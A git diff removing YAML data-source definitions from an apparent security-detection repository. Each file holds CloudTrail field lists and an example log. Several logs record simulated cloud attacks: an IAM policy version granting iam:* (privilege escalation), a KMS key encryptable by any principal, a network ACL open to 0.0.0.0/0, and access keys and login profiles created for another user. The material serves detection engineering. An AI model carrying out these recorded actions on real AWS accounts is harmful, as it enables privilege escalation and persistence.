-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::121521347698:user/bhavin_cli", "accountId": "121521347698", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"}, "eventTime": "2021-03-02T21:18:24Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateAccessKey", "awsRegion": "us-east-1", "sourceIPAddress": "12.25.72.12", "userAgent": "aws-cli/2.0.62 Python/3.9.0 Darwin/19.6.0 source/x86_64 command/iam.create-access-key", "requestParameters": {"userName": "AtomicRedTeam"}, "responseElements": {"accessKey": {"userName": "AtomicRedTeam", "accessKeyId": "AKIAYTOGP2RLOQ4ULYGT", "status": "Active", "createDate": "Mar 2, 2021 9:18:24 PM"}}, "requestID": "12c8773d-6c78-46bf-a8e4-f841adc8f70d", "eventID": "5772e8d5-cccc-470d-81ef-acacfe85a804", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "121521347698"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateKey.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreateKey.yml
deleted file mode 100644
index c9ea6d067f..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateKey.yml
+++ /dev/null
@@ -1,98 +0,0 @@
-event_name: AWS CloudTrail CreateKey
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.bypassPolicyLockoutSafetyCheck
-- requestParameters.customerMasterKeySpec
-- requestParameters.description
-- requestParameters.keyUsage
-- requestParameters.origin
-- requestParameters.policy
-- resources{}.ARN
-- resources{}.accountId
-- resources{}.type
-- responseElements.keyMetadata.aWSAccountId
-- responseElements.keyMetadata.arn
-- responseElements.keyMetadata.creationDate
-- responseElements.keyMetadata.customerMasterKeySpec
-- responseElements.keyMetadata.description
-- responseElements.keyMetadata.enabled
-- responseElements.keyMetadata.encryptionAlgorithms{}
-- responseElements.keyMetadata.keyId
-- responseElements.keyMetadata.keyManager
-- responseElements.keyMetadata.keyState
-- responseElements.keyMetadata.keyUsage
-- responseElements.keyMetadata.origin
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLK74OPBDR", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn": "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName": "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated": "false", "creationDate": "2021-01-11T09:03:18Z"}}}, "eventTime": "2021-01-11T09:56:31Z", "eventSource": "kms.amazonaws.com", "eventName": "CreateKey", "awsRegion": "us-west-2", "sourceIPAddress": "95.90.199.65", "userAgent": "aws-internal/3 aws-sdk-java/1.11.893 Linux/4.9.230-0.1.ac.223.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.272-b10 java/1.8.0_272 vendor/Oracle_Corporation", "requestParameters": {"origin": "AWS_KMS", "policy": "{\n    \"Id\": \"key-consolepolicy-3\",\n    \"Version\": \"2012-10-17\",\n    \"Statement\": [\n        {\n            \"Sid\": \"Enable IAM User Permissions\",\n            \"Effect\": \"Allow\",\n            \"Principal\": {\n                \"AWS\": \"arn:aws:iam::111111111111:root\"\n            },\n            \"Action\": \"kms:*\",\n            \"Resource\": \"*\"\n        },\n        {\n            \"Sid\": \"Allow access for Key Administrators\",\n            \"Effect\": \"Allow\",\n            \"Principal\": {\n                \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n            },\n            \"Action\": [\n                \"kms:Create*\",\n                \"kms:Describe*\",\n                \"kms:Enable*\",\n                \"kms:List*\",\n                \"kms:Put*\",\n                \"kms:Update*\",\n                \"kms:Revoke*\",\n                \"kms:Disable*\",\n                \"kms:Get*\",\n                \"kms:Delete*\",\n                \"kms:TagResource\",\n                \"kms:UntagResource\",\n                \"kms:ScheduleKeyDeletion\",\n                \"kms:CancelKeyDeletion\"\n            ],\n            \"Resource\": \"*\"\n        },\n        {\n            \"Sid\": \"Allow use of the key\",\n            \"Effect\": \"Allow\",\n            \"Principal\": {\n                \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n            },\n            \"Action\": [\n                \"kms:Encrypt\",\n                \"kms:Decrypt\",\n                \"kms:ReEncrypt*\",\n                \"kms:GenerateDataKey*\",\n                \"kms:DescribeKey\"\n            ],\n            \"Resource\": \"*\"\n        },\n        {\n            \"Sid\": \"Allow attachment of persistent resources\",\n            \"Effect\": \"Allow\",\n            \"Principal\": {\n                \"AWS\": \"arn:aws:iam::111111111111:user/patrick_cli\"\n            },\n            \"Action\": [\n                \"kms:CreateGrant\",\n                \"kms:ListGrants\",\n                \"kms:RevokeGrant\"\n            ],\n            \"Resource\": \"*\",\n            \"Condition\": {\n                \"Bool\": {\n                    \"kms:GrantIsForAWSResource\": \"true\"\n                }\n            }\n        },\n        {\n            \"Sid\": \"Allow use of the key\",\n            \"Effect\": \"Allow\",\n            \"Principal\": {\n                \"AWS\": \"*\"\n            },\n            \"Action\": [\n                \"kms:Encrypt\"\n            ],\n            \"Resource\": \"*\"\n        }\n    ]\n}", "description": "", "customerMasterKeySpec": "SYMMETRIC_DEFAULT", "bypassPolicyLockoutSafetyCheck": false, "tags": [], "keyUsage": "ENCRYPT_DECRYPT"}, "responseElements": {"keyMetadata": {"aWSAccountId": "111111111111", "keyId": "f2a82583-a7d3-4c92-8787-fe2baab1cee1", "arn": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1", "creationDate": "Jan 11, 2021, 9:56:30 AM", "enabled": true, "description": "", "keyUsage": "ENCRYPT_DECRYPT", "keyState": "Enabled", "origin": "AWS_KMS", "keyManager": "CUSTOMER", "customerMasterKeySpec": "SYMMETRIC_DEFAULT", "encryptionAlgorithms": ["SYMMETRIC_DEFAULT"]}}, "requestID": "3356af25-a237-471f-ba5e-abb37d4a256f", "eventID": "f09518ac-5ae5-4214-80ee-4f23ccdedd4c", "readOnly": false, "resources": [{"accountId": "111111111111", "type": "AWS::KMS::Key", "ARN": "arn:aws:kms:us-west-2:111111111111:key/f2a82583-a7d3-4c92-8787-fe2baab1cee1"}], "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateLoginProfile.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreateLoginProfile.yml
deleted file mode 100644
index c343704c7c..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateLoginProfile.yml
+++ /dev/null
@@ -1,79 +0,0 @@
-event_name: AWS CloudTrail CreateLoginProfile
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.passwordResetRequired
-- requestParameters.userName
-- responseElements.loginProfile.createDate
-- responseElements.loginProfile.passwordResetRequired
-- responseElements.loginProfile.userName
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLEHRX5YWNV", "arn": "arn:aws:iam::111111111111:user/bhavin_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLLAA6NJUM", "userName": "bhavin_cli"}, "eventTime": "2021-03-05T01:02:38Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateLoginProfile", "awsRegion": "us-east-1", "sourceIPAddress": "73.15.72.101", "userAgent": "aws-cli/2.0.62 Python/3.9.2 Darwin/19.6.0 source/x86_64 command/iam.create-login-profile", "requestParameters": {"userName": "AtomicRedTeam", "passwordResetRequired": false}, "responseElements": {"loginProfile": {"userName": "AtomicRedTeam", "createDate": "Mar 5, 2021 1:02:38 AM", "passwordResetRequired": false}}, "requestID": "f1b90364-8aed-4559-96cf-f5f2009bb7cb", "eventID": "ffb76906-6dd1-4219-adfe-e26b92036a1e", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateNetworkAclEntry.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreateNetworkAclEntry.yml
deleted file mode 100644
index 944e4e332e..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateNetworkAclEntry.yml
+++ /dev/null
@@ -1,95 +0,0 @@
-event_name: AWS CloudTrail CreateNetworkAclEntry
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- direction
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object
-- object_category
-- object_id
-- product
-- protocol
-- protocol_code
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.aclProtocol
-- requestParameters.cidrBlock
-- requestParameters.egress
-- requestParameters.networkAclId
-- requestParameters.ruleAction
-- requestParameters.ruleNumber
-- responseElements._return
-- responseElements.requestId
-- rule_action
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_ip_range
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAIJIESMXKGCJRCTPR6:pbareiss@splunk.local", "arn": "arn:aws:sts::111111111111:assumed-role/okta_adm_role/pbareiss@splunk.local", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLF3F7BXZK", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAIJIESMXKGCJRCTPR6", "arn": "arn:aws:iam::111111111111:role/okta_adm_role", "accountId": "111111111111", "userName": "okta_adm_role"}, "webIdFederationData": {}, "attributes": {"mfaAuthenticated": "false", "creationDate": "2021-01-12T08:36:15Z"}}}, "eventTime": "2021-01-12T08:38:39Z", "eventSource": "ec2.amazonaws.com", "eventName": "CreateNetworkAclEntry", "awsRegion": "eu-central-1", "sourceIPAddress": "95.90.199.65", "userAgent": "console.ec2.amazonaws.com", "requestParameters": {"networkAclId": "acl-078ccebebcbabe175", "ruleNumber": 10, "egress": false, "ruleAction": "allow", "icmpTypeCode": {}, "portRange": {}, "aclProtocol": "-1", "cidrBlock": "0.0.0.0/0"}, "responseElements": {"requestId": "d29c9c32-3a72-48d3-b612-6ba795e9ec64", "_return": true}, "requestID": "d29c9c32-3a72-48d3-b612-6ba795e9ec64", "eventID": "6d1ce00e-4099-463c-8a4d-2af2fb2178ba", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreatePolicyVersion.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreatePolicyVersion.yml
deleted file mode 100644
index 265c1b46c5..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreatePolicyVersion.yml
+++ /dev/null
@@ -1,80 +0,0 @@
-event_name: AWS CloudTrail CreatePolicyVersion
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.policyArn
-- requestParameters.policyDocument
-- requestParameters.setAsDefault
-- responseElements.policyVersion.createDate
-- responseElements.policyVersion.isDefaultVersion
-- responseElements.policyVersion.versionId
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLNMCDVJZAY", "arn": "arn:aws:iam::111111111111:user/rhino_escalate", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLHSQZPZFZ", "userName": "rhino_escalate"}, "eventTime": "2021-02-23T00:02:30Z", "eventSource": "iam.amazonaws.com", "eventName": "CreatePolicyVersion", "awsRegion": "us-east-1", "sourceIPAddress": "73.15.72.101", "userAgent": "aws-cli/2.0.62 Python/3.9.0 Darwin/19.6.0 source/x86_64 command/iam.create-policy-version", "requestParameters": {"policyArn": "arn:aws:iam::111111111111:policy/rhino_escalate", "policyDocument": "{\n   \"Version\": \"2012-10-17\",\n   \"Statement\": [\n       {\n           \"Sid\": \"AllowEverything\",\n           \"Effect\": \"Allow\",\n           \"Action\": \"iam:*\",\n           \"Resource\": \"*\"\n       }\n    ]\n }", "setAsDefault": true}, "responseElements": {"policyVersion": {"versionId": "v2", "isDefaultVersion": true, "createDate": "Feb 23, 2021 12:02:30 AM"}}, "requestID": "fa42b4b2-f34a-4673-8f9f-b25cf1f5005a", "eventID": "33149175-90fd-4cff-a43b-408e4f848c1c", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory": "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateSnapshot.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreateSnapshot.yml
deleted file mode 100644
index db119fa8cc..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateSnapshot.yml
+++ /dev/null
@@ -1,89 +0,0 @@
-event_name: AWS CloudTrail CreateSnapshot
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.tagSpecificationSet.items{}.resourceType
-- requestParameters.tagSpecificationSet.items{}.tags{}.key
-- requestParameters.tagSpecificationSet.items{}.tags{}.value
-- requestParameters.volumeId
-- responseElements.encrypted
-- responseElements.ownerId
-- responseElements.requestId
-- responseElements.snapshotId
-- responseElements.startTime
-- responseElements.status
-- responseElements.tagSet.items{}.key
-- responseElements.tagSet.items{}.value
-- responseElements.volumeId
-- responseElements.volumeSize
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLCNEAQXWZV", "arn": "arn:aws:iam::111111111111:user/bhavin_console", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLF5EAXXXX", "userName": "bhavin_console"}, "eventTime": "2023-03-20T22:31:18Z", "eventSource": "ec2.amazonaws.com", "eventName": "CreateSnapshot", "awsRegion": "us-west-2", "sourceIPAddress": "72.135.1.1", "userAgent": "APN/1.0 HashiCorp/1.0 Terraform/1.1.2 (+https://www.terraform.io) terraform-provider-aws/3.76.1 (+https://registry.terraform.io/providers/hashicorp/aws) aws-sdk-go/1.44.157 (go1.19.3; darwin; amd64) stratus-red-team_46665bb8-dc15-4aba-a5ad-a362772b3f0d HashiCorp-terraform-exec/0.17.3", "requestParameters": {"volumeId": "vol-0363e53e12f67c9b7", "tagSpecificationSet": {"items": [{"resourceType": "snapshot", "tags": [{"key": "StratusRedTeam", "value": "true"}]}]}}, "responseElements": {"requestId": "fefed928-d461-45f0-802f-a99d94c833a8", "snapshotId": "snap-02effb3bb62786b18", "volumeId": "vol-0363e53e12f67c9b7", "status": "pending", "startTime": 1679351478226, "ownerId": "111111111111", "volumeSize": "1", "encrypted": false, "tagSet": {"items": [{"key": "StratusRedTeam", "value": "true"}]}}, "requestID": "fefed928-d461-45f0-802f-a99d94c833a8", "eventID": "2d52d141-d1e6-4d1f-a380-1461c1bf9f83", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateTask.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreateTask.yml
deleted file mode 100644
index 853efff21e..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateTask.yml
+++ /dev/null
@@ -1,88 +0,0 @@
-event_name: AWS CloudTrail CreateTask
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.cloudWatchLogGroupArn
-- requestParameters.destinationLocationArn
-- requestParameters.options.logLevel
-- requestParameters.options.verifyMode
-- requestParameters.schedule.scheduleExpression
-- requestParameters.sourceLocationArn
-- responseElements.taskArn
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AROAYTOGP2RLDF6WQQQQQ:abc@acme.com", "arn": "arn:aws:sts::111111111111:assumed-role/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f/abc@acme.com", "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLOB2GM111", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLDF6WQQQQQ", "arn": "arn:aws:iam::111111111111:role/aws-reserved/sso.amazonaws.com/us-west-2/AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f", "accountId": "111111111111", "userName": "AWSReservedSSO_SPLKAdministratorAccess_d9ce1347d0a6dd3f"}, "webIdFederationData": {}, "attributes": {"creationDate": "2023-03-14T21:53:15Z", "mfaAuthenticated": "false"}}}, "eventTime": "2023-03-14T22:05:36Z", "eventSource": "datasync.amazonaws.com", "eventName": "CreateTask", "awsRegion": "us-west-2", "sourceIPAddress": "1.1.1.1", "userAgent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36", "requestParameters": {"sourceLocationArn": "arn:aws:datasync:us-west-2:111111111111:location/loc-0921d426f7955d416", "destinationLocationArn": "arn:aws:datasync:us-west-1:111111111111:location/loc-0b94cf657c358ef06", "cloudWatchLogGroupArn": "arn:aws:logs:us-west-2:111111111111:log-group:/aws/datasync", "options": {"verifyMode": "ONLY_FILES_TRANSFERRED", "logLevel": "BASIC"}, "excludes": [], "schedule": {"scheduleExpression": "cron(6 * * * ? *)"}, "tags": [], "includes": []}, "responseElements": {"taskArn": "arn:aws:datasync:us-west-2:111111111111:task/task-0c77dc0d4b0792ce6"}, "requestID": "de5f4282-aa2b-49b8-8d1b-c3bdb11e2fba", "eventID": "def4cd05-f845-4aec-bc96-07d6ce420d16", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "datasync.us-west-2.amazonaws.com"}, "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateVirtualMFADevice.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_CreateVirtualMFADevice.yml
deleted file mode 100644
index 07afead5c3..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_CreateVirtualMFADevice.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: AWS CloudTrail CreateVirtualMFADevice
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.path
-- requestParameters.virtualMFADeviceName
-- responseElements.virtualMFADevice.serialNumber
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId": "140429656527", "arn": "arn:aws:iam::140429656527:root", "accountId": "140429656527", "accessKeyId": "ASIASBMSCQHH2YXNXJBU", "sessionContext": {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate": "2023-01-30T22:59:36Z", "mfaAuthenticated": "false"}}}, "eventTime": "2023-01-30T23:02:23Z", "eventSource": "iam.amazonaws.com", "eventName": "CreateVirtualMFADevice", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.6", "userAgent": "AWS Internal", "requestParameters": {"path": "/", "virtualMFADeviceName": "strt_mfa_2"}, "responseElements": {"virtualMFADevice": {"serialNumber": "arn:aws:iam::140429656527:mfa/strt_mfa_2"}}, "requestID": "2fbe2074-55f8-4ec6-ad32-0b250803cf46", "eventID": "7e1c493d-c3c3-4f4a-ae4f-8cdd38970027", "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "140429656527", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeactivateMFADevice.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeactivateMFADevice.yml
deleted file mode 100644
index a7b5a75609..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeactivateMFADevice.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: AWS CloudTrail DeactivateMFADevice
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.serialNumber
-- requestParameters.userName
-- responseElements
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
